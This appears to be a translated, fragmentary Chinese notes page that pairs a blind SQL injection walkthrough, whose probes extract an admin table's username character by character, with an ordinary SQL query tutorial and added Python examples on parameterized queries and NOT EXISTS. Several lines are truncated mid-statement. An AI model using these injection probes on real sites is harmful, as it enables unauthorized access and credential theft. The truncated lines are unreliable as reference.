Testing whether injection is possible
http://127.0.0.1/xx?id=11 and 1=1 (normal page)
http://127.0.0.1/xx?id=11 and 1=2 (error page)
Testing for the table
http://127.0.0.1/xx?id=11 and exists (select * from admin)
Testing for the column
http://127.0.0.1/xx?id=11 and exists (select username from admin)
Testing for the ID
http://127.0.0.1/xx?id=11 and exists (select id from admin where ID=1)
Testing the length
http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)
Testing whether the database is MSSQL
http://127.0.0.1/xx?id=11 and exists (select * from sysobjects)
Testing whether it is an English character
(Access database)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)
(MSSQL database)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(sub
Testing the English character
(Access database)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)
(MSSQL database)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(sub
Testing which character it is
(Access database)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)
(MSSQL database)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(sub
Commonly used functions
Access: asc(
Purpose: returns a certain
Access: chr(number) SQLServer: nchar(number)
Purpose: the opposite of asc
Access: mid(
Purpose: returns
Access: abc(number) SQLServer: abc(number)
Purpose: returns the number
Access: A between B And C SQLServer: A between B And C
Purpose: tests whether A lies between B and C
and exists(Select top 1 * From 用户 order by id)
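Why the probes above produce different pages, and what removes the difference, shown as an added example that is not part of the original page. It assumes SQLite in place of Access/MSSQL; the "articles" table, the function names and the sample rows are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data: "articles" is hypothetical, "admin" mirrors the page's probes.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        create table articles (id integer primary key, title text);
        insert into articles values (11, 'hello');
        create table admin (id integer primary key, username text);
        insert into admin values (1, 'admin');
    """)
    return db

def fetch_vulnerable(db, raw_id):
    # The id parameter is concatenated into the statement, so everything after
    # "11" is parsed as SQL and the page's boolean conditions change the result.
    return db.execute("select title from articles where id=" + raw_id).fetchall()

def fetch_parameterized(db, raw_id):
    # Validate the type, then bind the value: the input is never parsed as SQL.
    if not (raw_id.isascii() and raw_id.isdigit()):
        return None  # the caller answers every malformed id the same way
    return db.execute("select title from articles where id=?", (int(raw_id),)).fetchall()

PROBES = ["11", "11 and 1=1", "11 and 1=2",
          "11 and exists (select username from admin)",
          "11 and exists (select nosuchcol from admin)"]

def responses(fetch):
    # Classify what the page would show for each id value.
    db = make_db()
    out = {}
    for probe in PROBES:
        try:
            rows = fetch(db, probe)
            out[probe] = "rejected" if rows is None else ("normal" if rows else "empty")
        except sqlite3.Error:
            out[probe] = "error"
    return out

if __name__ == "__main__":
    for name, fn in (("vulnerable", fetch_vulnerable), ("parameterized", fetch_parameterized)):
        print(name, responses(fn))
```

With the bound parameter every non-numeric id gets the same response, so the true/false difference the tests on this page rely on no longer exists.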
1. Displaying column names in query results:
a. Using the as keyword: select name as '姓名' from students order by age
b. Written directly: select name '姓名' from students order by age
2. Exact lookup:
a. Restricting the range with in: select * from students where native in ('湖南', '四川')
b. between...and: select * from students where age between 20 and 30
c. "=": select * from students where name = '李山'
d. like: select * from students where name like '李%' (note that the query condition contains "%"
e.
3. For time-type variables
a. smalldatetime: directly according to
4. Aggregate functions
a. count
b. avg(column) computes the average
c. max(column) and min(column)
5. Grouping with group
Commonly used when computing statistics
Note: "group by" whichever column matches the angle you are grouping from
For multi-level grouping
sex (gender)
select grade, mno, gender, count(*) from students group by grade, mno, gender
group is usually also combined with having
select sno,count(*) from grades where mark<60 group by sno having count(*)>1
6. UNION
Merges query results
SELECT * FROM students WHERE name like '张%' UNION [ALL] SELECT * FROM students WHERE name like '李%'
7. Multi-table queries
a. Inner join
select g.sno,s.name,c.coursename from grades g JOIN students s (note: aliases can be used)
b. Outer join
b1. Left join
select courses.cno,max(coursename),count(sno) from courses LEFT JOIN grades
Characteristic of a left join: displays everything in the left table
A left outer join returns those that exist in the left table but that the right table does not have
b2. Right join
Similar to a left join
b3. Full join
select sno,name,major from students FULL JOIN majors
In the tables on both sides
c. Self join
select c1.cno,c1.coursename,c1.pno,c2.coursename from courses c1,courses c2 where c1.pno=c2.cno
Using aliases solves the problem
d. Cross join
select lastname+firstname from lastname CROSS JOIN firstname
Equivalent to taking the Cartesian product
8. Nested queries
a. Using the keyword IN, for example querying 猪猪山
select * from students where native in (select native from students where name='猪猪')
b. Using the keyword EXISTS, for example
select * from students where sno in (select sno from grades where cno='B2')
select * from students where exists (select * from grades where grades.sno=students.sno AND cno='B2')
9. On sorting with order
a. For sorting with order
b. For sorting with order, you can sort according to the query's
select sno,count(*) ,avg(mark) from grades group by sno having avg(mark)>85 order by 3
10. Other
a. For ones that contain spaces
b. For a column that has no data
c. Take care to distinguish, in nested queries, the use of
d. Take care when expressing a negative meaning
For example
select students.* from students, grades where students.sno=grades.sno AND grades.cno <> 'B2'
The above
select * from students where not exists (select * from grades where grades.sno=students.sno AND cno='B2')
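The two queries in item d do not return the same students, because the join with <> filters individual grade rows while not exists tests each student as a whole. The following added example (not from the original page) runs both on SQLite; the sample rows are constructed, and the column lists are an assumption based on the columns the page's queries use.

```python
import sqlite3

def load():
    # Constructed data: student 1 took B2 and A1, student 2 took only A1,
    # student 3 has no grade rows at all.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        create table students (sno integer primary key, name text);
        create table grades (sno integer, cno text, mark integer);
        insert into students values (1, 's1'), (2, 's2'), (3, 's3');
        insert into grades values (1, 'B2', 70), (1, 'A1', 80), (2, 'A1', 65);
    """)
    return db

# The two queries from item d, with straight quotes.
JOIN_NE = """select students.* from students, grades
             where students.sno=grades.sno AND grades.cno <> 'B2'"""
NOT_EXISTS = """select * from students where not exists
                (select * from grades where grades.sno=students.sno AND cno='B2')"""

def snos(query):
    # Student numbers returned by a query, sorted for comparison.
    return sorted(row[0] for row in load().execute(query))

def wrongly_included():
    # Students the <> join returns although they do have a B2 grade.
    return sorted(set(snos(JOIN_NE)) - set(snos(NOT_EXISTS)))

def wrongly_missing():
    # Students without a B2 grade that the <> join fails to return.
    return sorted(set(snos(NOT_EXISTS)) - set(snos(JOIN_NE)))

if __name__ == "__main__":
    print("join with <> :", snos(JOIN_NE))
    print("not exists   :", snos(NOT_EXISTS))
    print("wrongly included:", wrongly_included(), "wrongly missing:", wrongly_missing())
```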
11. On difficult multi-level nested queries
The outermost